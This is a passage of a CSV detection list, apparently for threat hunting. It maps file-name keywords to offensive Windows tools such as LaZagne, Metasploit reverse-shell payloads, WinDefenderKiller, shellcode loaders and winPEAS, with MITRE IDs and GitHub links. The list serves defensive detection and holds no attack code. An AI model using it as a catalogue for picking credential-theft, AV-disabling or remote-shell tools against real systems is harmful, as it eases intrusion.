TA0009,N/A,N/A,AD Enumeration,https://github.com/ropnop/windapsearch,1,1,N/A,N/A,7,666,134,2022-04-20T07:40:42Z,2016-08-10T21:43:30Z -*windapsearch-master*,offensive_tool_keyword,windapsearch,Python script to enumerate users - groups and computers from a Windows domain through LDAP queries,T1087.002 - T1018 - T1069.002,TA0007 - TA0009,N/A,N/A,AD 
Enumeration,https://github.com/ropnop/windapsearch,1,1,N/A,N/A,7,666,134,2022-04-20T07:40:42Z,2016-08-10T21:43:30Z -*WinDefenderKiller*,offensive_tool_keyword,WinDefenderKiller,Windows Defender Killer | C++ Code Disabling Permanently Windows Defender using Registry Keys,T1562.001 - T1055.002 - T1070.004,TA0005 - TA0002,N/A,N/A,Defense Evasion,https://github.com/S12cybersecurity/WinDefenderKiller,1,1,N/A,10,4,327,47,2023-07-27T11:06:24Z,2023-07-25T10:32:25Z -*winDefKiller.exe*,offensive_tool_keyword,WinDefenderKiller,Windows Defender Killer | C++ Code Disabling Permanently Windows Defender using Registry Keys,T1562.001 - T1055.002 - T1070.004,TA0005 - TA0002,N/A,N/A,Defense Evasion,https://github.com/S12cybersecurity/WinDefenderKiller,1,1,N/A,10,4,327,47,2023-07-27T11:06:24Z,2023-07-25T10:32:25Z -*WindfarmDynamite.cdproj*,offensive_tool_keyword,WindfarmDynamite,WindfarmDynamite is a proof-of-concept for code injection using the Windows Notification Facility (WNF). Of interest here is that this avoids suspect thread orchestration APIs (like CreateRemoteThread),T1055.013 - T1546.008,TA0005 - TA0004,N/A,N/A,Exploitation tools,https://github.com/FuzzySecurity/Sharp-Suite/tree/master/WindfarmDynamite,1,1,N/A,N/A,10,1069,209,2022-12-22T23:57:19Z,2018-12-10T00:08:37Z -*WindfarmDynamite.exe*,offensive_tool_keyword,WindfarmDynamite,WindfarmDynamite is a proof-of-concept for code injection using the Windows Notification Facility (WNF). Of interest here is that this avoids suspect thread orchestration APIs (like CreateRemoteThread),T1055.013 - T1546.008,TA0005 - TA0004,N/A,N/A,Exploitation tools,https://github.com/FuzzySecurity/Sharp-Suite/tree/master/WindfarmDynamite,1,1,N/A,N/A,10,1069,209,2022-12-22T23:57:19Z,2018-12-10T00:08:37Z -*WindfarmDynamite.sln*,offensive_tool_keyword,WindfarmDynamite,WindfarmDynamite is a proof-of-concept for code injection using the Windows Notification Facility (WNF). 
Of interest here is that this avoids suspect thread orchestration APIs (like CreateRemoteThread),T1055.013 - T1546.008,TA0005 - TA0004,N/A,N/A,Exploitation tools,https://github.com/FuzzySecurity/Sharp-Suite/tree/master/WindfarmDynamite,1,1,N/A,N/A,10,1069,209,2022-12-22T23:57:19Z,2018-12-10T00:08:37Z -*Windows Exploit*,offensive_tool_keyword,_,windows exploit keyword often used in poc exploit github repo or could be a file name or folder,T1068 - T1070 - T1071 - T1078 - T1085 - T1090 - T1105 - T1112 - T1134 - T1135 - T1136 - T1203 - T1210 - T1211 - T1218 - T1222 - T1247 - T1499 - T1505 - T1526 - T1547 - T1548 - T1550 - T1553 - T1574 - T1583 - T1584 - T1587 - T1588 - T1590 - T1591 - T1592 - T1596 - T1600,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011,N/A,N/A,Exploitation tools,N/A,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*windows*lsa_secrets.py*,offensive_tool_keyword,LaZagne,The LaZagne project is an open source application used to retrieve lots of passwords stored on a local computer. Each software stores its passwords using different techniques (plaintext APIs custom algorithms databases etc.). This tool has been developed for the purpose of finding these passwords for the most commonly-used software.,T1552 - T1003 - T1555,TA0006 - TA0008,N/A,N/A,Credential Access,https://github.com/AlessandroZ/LaZagne,1,1,N/A,10,10,8527,1980,2023-08-12T12:38:22Z,2015-02-16T14:10:02Z -*Windows.Hacktool.*,signature_keyword,Antivirus Signature,Antiviurs signature_keyword,N/A,N/A,N/A,N/A,Malware,N/A,1,0,N/A,10,10,N/A,N/A,N/A,N/A -*windows/c_payload_util*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. 
and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*Windows/lazagne.spec*,offensive_tool_keyword,LaZagne,The LaZagne project is an open source application used to retrieve lots of passwords stored on a local computer. Each software stores its passwords using different techniques (plaintext APIs custom algorithms databases etc.). This tool has been developed for the purpose of finding these passwords for the most commonly-used software.,T1552 - T1003 - T1555,TA0006 - TA0008,N/A,N/A,Credential Access,https://github.com/AlessandroZ/LaZagne,1,1,N/A,10,10,8527,1980,2023-08-12T12:38:22Z,2015-02-16T14:10:02Z -*windows/shell_reverse_tcp*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*windows/x64/meterpreter_reverse_tcp*,offensive_tool_keyword,charlotte,c++ fully undetected shellcode launcher,T1055.012 - T1059.003 - T1027.002,TA0005 - TA0040,N/A,N/A,Defense Evasion,https://github.com/9emin1/charlotte,1,1,N/A,10,10,930,234,2021-06-11T04:44:18Z,2021-05-13T07:32:03Z -*windows_agent/asm/x64/alter_pe_sections*,offensive_tool_keyword,AlanFramework,Alan Framework is a post-exploitation framework useful during red-team activities.,T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018,TA0002 - TA0005 - TA0011 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/enkomio/AlanFramework,1,1,N/A,10,10,430,66,2022-08-23T18:20:33Z,2021-01-26T22:56:50Z -*windows_agent/asm/x86/alter_pe_sections*,offensive_tool_keyword,AlanFramework,Alan Framework is a post-exploitation framework useful during red-team activities.,T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018,TA0002 - TA0005 - TA0011 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/enkomio/AlanFramework,1,1,N/A,10,10,430,66,2022-08-23T18:20:33Z,2021-01-26T22:56:50Z -*windows_agent/dll_main.*,offensive_tool_keyword,AlanFramework,Alan Framework is a post-exploitation framework useful during red-team activities.,T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018,TA0002 - TA0005 - TA0011 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/enkomio/AlanFramework,1,1,N/A,10,10,430,66,2022-08-23T18:20:33Z,2021-01-26T22:56:50Z -*windows_agent/exe_main.*,offensive_tool_keyword,AlanFramework,Alan Framework is a post-exploitation framework useful during red-team activities.,T1055 - T1071 - T1060 - 
T1560 - T1021 - T1005 - T1018,TA0002 - TA0005 - TA0011 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/enkomio/AlanFramework,1,1,N/A,10,10,430,66,2022-08-23T18:20:33Z,2021-01-26T22:56:50Z -*windows_agent/win_*.c*,offensive_tool_keyword,AlanFramework,Alan Framework is a post-exploitation framework useful during red-team activities.,T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018,TA0002 - TA0005 - TA0011 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/enkomio/AlanFramework,1,1,N/A,10,10,430,66,2022-08-23T18:20:33Z,2021-01-26T22:56:50Z -*windows_agent/win_named_pipe.*,offensive_tool_keyword,AlanFramework,Alan Framework is a post-exploitation framework useful during red-team activities.,T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018,TA0002 - TA0005 - TA0011 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/enkomio/AlanFramework,1,1,N/A,10,10,430,66,2022-08-23T18:20:33Z,2021-01-26T22:56:50Z -*windows_agent/win_shell.*,offensive_tool_keyword,AlanFramework,Alan Framework is a post-exploitation framework useful during red-team activities.,T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018,TA0002 - TA0005 - TA0011 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/enkomio/AlanFramework,1,1,N/A,10,10,430,66,2022-08-23T18:20:33Z,2021-01-26T22:56:50Z -*windows_autologin.md*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*windows_console_interceptor*dll_main.c*,offensive_tool_keyword,AlanFramework,Alan Framework is a post-exploitation framework useful during red-team activities.,T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018,TA0002 - TA0005 - TA0011 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/enkomio/AlanFramework,1,1,N/A,10,10,430,66,2022-08-23T18:20:33Z,2021-01-26T22:56:50Z -*windows_console_interceptor*exe_main.c*,offensive_tool_keyword,AlanFramework,Alan Framework is a post-exploitation framework useful during red-team activities.,T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018,TA0002 - TA0005 - TA0011 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/enkomio/AlanFramework,1,1,N/A,10,10,430,66,2022-08-23T18:20:33Z,2021-01-26T22:56:50Z -*windows_console_interceptor*interceptor.*,offensive_tool_keyword,AlanFramework,Alan Framework is a post-exploitation framework useful during red-team activities.,T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018,TA0002 - TA0005 - TA0011 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/enkomio/AlanFramework,1,1,N/A,10,10,430,66,2022-08-23T18:20:33Z,2021-01-26T22:56:50Z -*windows_credentials.py*,offensive_tool_keyword,monkey,Infection Monkey - An automated pentest tool,T1587 T1570 T1021 T1072 T1550,N/A,N/A,N/A,Exploitation tools,https://github.com/guardicore/monkey,1,1,N/A,N/A,10,6330,762,2023-10-03T21:06:53Z,2015-08-30T07:22:51Z -*windows_key.py*,offensive_tool_keyword,koadic,Koadic. or COM Command & Control. 
is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/offsecginger/koadic,1,1,N/A,10,10,199,62,2022-01-03T01:07:01Z,2022-01-03T01:05:43Z -*windows_recon.bat*,offensive_tool_keyword,Windows-Privilege-Escalation,Windows Privilege Escalation Techniques and Scripts,T1055 - T1548 - T1078,TA0004 - TA0005 - TA0040,N/A,N/A,Privilege Escalation,https://github.com/frizb/Windows-Privilege-Escalation,1,1,N/A,N/A,8,710,185,2020-03-25T22:35:02Z,2017-05-12T13:09:50Z -*windows_sam_hivenightmare.md*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*windows_sam_hivenightmare.rb*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*windows10_ntfs_crash_dos*,offensive_tool_keyword,POC,PoC for a NTFS crash that I discovered. in various Windows versions Type of issue: denial of service. One can generate blue-screen-of-death using a handcrafted NTFS image. This Denial of Service type of attack. can be driven from user mode. limited user account or Administrator. 
It can even crash the system if it is in locked state.,T1499.002 - T1059.001 - T1538.002,TA0002 - TA0007 - TA0008,N/A,N/A,DDOS,https://github.com/mtivadar/windows10_ntfs_crash_dos,1,1,N/A,N/A,6,589,137,2020-04-28T18:11:52Z,2018-04-27T19:31:59Z -*Windows7-BypassLogon-Screen.ino*,offensive_tool_keyword,Pateensy,payload for teensy like a rubber ducky but the syntax is different. this Human interfaes device ( HID attacks ). Penetration With Teensy,T1025 T1052,N/A,N/A,N/A,Exploitation tools,https://github.com/screetsec/Pateensy,1,1,N/A,N/A,2,132,64,2017-01-26T12:02:56Z,2016-03-21T07:29:38Z -*WindowsEnum -*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - 
APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,0,Invoke-WinEnum.ps1,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*WindowsExploits*,offensive_tool_keyword,Exploits,A curated archive of complied and tested public Windows exploits.,T1213 - T1210 - T1188 - T1055,TA0001 - TA0009 - TA0008,N/A,N/A,Exploitation tools,https://github.com/WindowsExploits/Exploits,1,1,N/A,N/A,10,1212,565,2020-05-29T19:09:52Z,2017-06-05T15:39:22Z -*windows-exploit-suggester.*,offensive_tool_keyword,cobaltstrike,Erebus CobaltStrike post penetration testing plugin,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/DeEpinGh0st/Erebus,1,1,N/A,10,10,1356,214,2021-10-28T06:20:51Z,2019-09-26T09:32:00Z -*windows-forkbomb.ino*,offensive_tool_keyword,Pateensy,payload for teensy like a rubber ducky but the syntax is different. this Human interfaes device ( HID attacks ). 
Penetration With Teensy,T1025 T1052,N/A,N/A,N/A,Exploitation tools,https://github.com/screetsec/Pateensy,1,1,N/A,N/A,2,132,64,2017-01-26T12:02:56Z,2016-03-21T07:29:38Z -*WindowsLies*BlockWindows*,offensive_tool_keyword,BlockWindows,Stop Windows 7 through 10 Nagging and Spying updates. Tasks. IPs. and services. Works with Windows 7 through 10,T1059 - T1562 - T1053 - T1543,TA0002 - TA0003 - TA0004 - TA0008,N/A,N/A,Defense Evasion,https://github.com/WindowsLies/BlockWindows,1,1,N/A,N/A,7,644,109,2020-04-11T15:38:12Z,2015-08-26T01:17:57Z -*Windows-Post-Exploitation*,offensive_tool_keyword,Windows-Post-Exploitation,Windows Post Exploitation list of tools on github. could also be related to folder name,T1021 - T1059 - T1078 - T1056 - T1028 - T1053 - T1003,TA0002 - TA0003 - TA0004 - TA0007 - TA0008 - TA0009 - TA0011,N/A,N/A,POST Exploitation tools,https://github.com/emilyanncr/Windows-Post-Exploitation,1,1,N/A,N/A,5,491,122,2021-09-20T01:47:13Z,2017-11-18T04:16:41Z -*windows-privesc-check*,offensive_tool_keyword,Windows-Privilege-Escalation,Windows Privilege Escalation Techniques and Scripts,T1055 - T1548 - T1078,TA0004 - TA0005 - TA0040,N/A,N/A,Privilege Escalation,https://github.com/frizb/Windows-Privilege-Escalation,1,1,N/A,N/A,8,710,185,2020-03-25T22:35:02Z,2017-05-12T13:09:50Z -*Windows-Privilege-Escalation*,offensive_tool_keyword,Windows-Privilege-Escalation,Windows Privilege Escalation Techniques and Scripts,T1055 - T1548 - T1078,TA0004 - TA0005 - TA0040,N/A,N/A,Privilege Escalation,https://github.com/frizb/Windows-Privilege-Escalation,1,1,N/A,N/A,8,710,185,2020-03-25T22:35:02Z,2017-05-12T13:09:50Z -*WindowsShareFinder.cs*,offensive_tool_keyword,SMBeagle,SMBeagle is an (SMB) fileshare auditing tool that hunts out all files it can see in the network and reports if the file can be read and/or written. 
All these findings are streamed out to either a CSV file or an elasticsearch host.,T1087.002 - T1021.002 - T1210,TA0007 - TA0008 - TA0003,N/A,N/A,Discovery,https://github.com/punk-security/SMBeagle,1,1,N/A,9,7,650,79,2023-07-28T09:35:30Z,2021-05-31T19:46:57Z -*winexec.notepad.raw*,offensive_tool_keyword,inceptor,Template-Driven AV/EDR Evasion Framework,T1562.001 - T1059.003 - T1027.002 - T1070.004,TA0005 - TA0040,N/A,N/A,Defense Evasion,https://github.com/klezVirus/inceptor,1,0,N/A,N/A,10,1356,243,2023-07-25T15:28:56Z,2021-08-02T15:35:57Z -*WinhttpShellcode.cpp*,offensive_tool_keyword,Shellcode-Hide,simple shellcode Loader - Encoders (base64 - custom - UUID - IPv4 - MAC) - Encryptors (AES) - Fileless Loader (Winhttp socket),T1059.003 - T1027 - T1132 - T1027.002 - T1045 - T1027.004 - T1105,TA0005 - TA0001 - TA0003,N/A,N/A,Defense Evasion,https://github.com/TheD1rkMtr/Shellcode-Hide,1,1,N/A,9,3,296,75,2023-08-02T02:22:20Z,2023-02-05T17:31:43Z -*WinhttpShellcode.exe*,offensive_tool_keyword,Shellcode-Hide,simple shellcode Loader - Encoders (base64 - custom - UUID - IPv4 - MAC) - Encryptors (AES) - Fileless Loader (Winhttp socket),T1059.003 - T1027 - T1132 - T1027.002 - T1045 - T1027.004 - T1105,TA0005 - TA0001 - TA0003,N/A,N/A,Defense Evasion,https://github.com/TheD1rkMtr/Shellcode-Hide,1,1,N/A,9,3,296,75,2023-08-02T02:22:20Z,2023-02-05T17:31:43Z -*WinhttpShellcode.sln*,offensive_tool_keyword,Shellcode-Hide,simple shellcode Loader - Encoders (base64 - custom - UUID - IPv4 - MAC) - Encryptors (AES) - Fileless Loader (Winhttp socket),T1059.003 - T1027 - T1132 - T1027.002 - T1045 - T1027.004 - T1105,TA0005 - TA0001 - TA0003,N/A,N/A,Defense Evasion,https://github.com/TheD1rkMtr/Shellcode-Hide,1,1,N/A,9,3,296,75,2023-08-02T02:22:20Z,2023-02-05T17:31:43Z -*WinhttpShellcode.vcxproj*,offensive_tool_keyword,Shellcode-Hide,simple shellcode Loader - Encoders (base64 - custom - UUID - IPv4 - MAC) - Encryptors (AES) - Fileless Loader (Winhttp socket),T1059.003 - T1027 - T1132 - 
T1027.002 - T1045 - T1027.004 - T1105,TA0005 - TA0001 - TA0003,N/A,N/A,Defense Evasion,https://github.com/TheD1rkMtr/Shellcode-Hide,1,1,N/A,9,3,296,75,2023-08-02T02:22:20Z,2023-02-05T17:31:43Z -*Win-Ops-Master.*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*Winpayloads*,offensive_tool_keyword,Winpayloads,Undetectable Windows Payload Generation with extras Running on Python2.7,T1203 - T1027 - T1059,TA0002 - TA0003 - TA0007,N/A,N/A,Defense Evasion,https://github.com/nccgroup/Winpayloads,1,1,N/A,N/A,10,1517,361,2022-11-08T08:14:23Z,2015-10-09T09:29:49Z -*winPEAS.bat*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,1,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*winPEAS.bat*,offensive_tool_keyword,PEASS,PEASS - Privilege Escalation Awesome Scripts SUITE,T1068 - T1055 - 
T1053 - T1059 - T1134 - T1216 - T1003 - T1187 - T1548.001 - T1548.002,TA0002 - TA0004 - TA0006 - TA0008 - TA0007 - TA0005,N/A,N/A,Privilege Escalation,https://github.com/carlospolop/PEASS-ng,1,1,N/A,N/A,10,13375,2820,2023-10-02T22:12:50Z,2019-01-13T19:58:24Z -*WinPEAS.exe*,offensive_tool_keyword,PEASS,PEASS - Privilege Escalation Awesome Scripts SUITE,T1068 - T1055 - T1053 - T1059 - T1134 - T1216 - T1003 - T1187 - T1548.001 - T1548.002,TA0002 - TA0004 - TA0006 - TA0008 - TA0007 - TA0005,N/A,N/A,Privilege Escalation,https://github.com/carlospolop/PEASS-ng,1,1,N/A,N/A,10,13375,2820,2023-10-02T22:12:50Z,2019-01-13T19:58:24Z -*winPEAS.exe*,offensive_tool_keyword,sharpcollection,Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.,T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011,N/A,N/A,Exploitation tools,https://github.com/Flangvik/SharpCollection,1,1,N/A,N/A,10,1885,285,2023-09-23T03:34:27Z,2020-06-05T12:50:00Z -*winPEAS.ps1*,offensive_tool_keyword,PEASS,PEASS - Privilege Escalation Awesome Scripts SUITE,T1068 - T1055 - T1053 - T1059 - T1134 - T1216 - T1003 - T1187 - T1548.001 - T1548.002,TA0002 - TA0004 - TA0006 - TA0008 - TA0007 - TA0005,N/A,N/A,Privilege Escalation,https://github.com/carlospolop/PEASS-ng,1,1,N/A,N/A,10,13375,2820,2023-10-02T22:12:50Z,2019-01-13T19:58:24Z -*winPEAS.txt*,offensive_tool_keyword,WinPwn,Automation for internal Windows Penetrationtest AD-Security,T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035,TA0006 - TA0007 - TA0002 - TA0005 - TA0040,N/A,N/A,Exploitation 
Tools,https://github.com/S3cur3Th1sSh1t/WinPwn,1,1,N/A,N/A,10,2960,495,2023-07-13T14:09:33Z,2018-03-07T12:51:25Z -*winPEASany.exe*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,1,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*winPEASany.exe*,offensive_tool_keyword,PEASS,PEASS - Privilege Escalation Awesome Scripts SUITE,T1068 - T1055 - T1053 - T1059 - T1134 - T1216 - T1003 - T1187 - T1548.001 - T1548.002,TA0002 - TA0004 - TA0006 - TA0008 - TA0007 - TA0005,N/A,N/A,Privilege Escalation,https://github.com/carlospolop/PEASS-ng,1,1,N/A,N/A,10,13375,2820,2023-10-02T22:12:50Z,2019-01-13T19:58:24Z -*winPEASany_ofs.exe*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,1,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*winPEASany_ofs.exe*,offensive_tool_keyword,PEASS,PEASS - Privilege Escalation Awesome Scripts SUITE,T1068 - T1055 - T1053 - T1059 - T1134 - T1216 - T1003 - T1187 - T1548.001 - T1548.002,TA0002 - TA0004 - TA0006 - TA0008 - TA0007 - TA0005,N/A,N/A,Privilege Escalation,https://github.com/carlospolop/PEASS-ng,1,1,N/A,N/A,10,13375,2820,2023-10-02T22:12:50Z,2019-01-13T19:58:24Z -*winPEAS-Obfuscated*,offensive_tool_keyword,PEASS,PEASS - Privilege Escalation Awesome Scripts SUITE,T1068 - T1055 - T1053 - T1059 - T1134 - T1216 - T1003 - T1187 - T1548.001 - T1548.002,TA0002 - TA0004 - TA0006 - TA0008 - TA0007 - TA0005,N/A,N/A,Privilege Escalation,https://github.com/carlospolop/PEASS-ng,1,1,N/A,N/A,10,13375,2820,2023-10-02T22:12:50Z,2019-01-13T19:58:24Z 
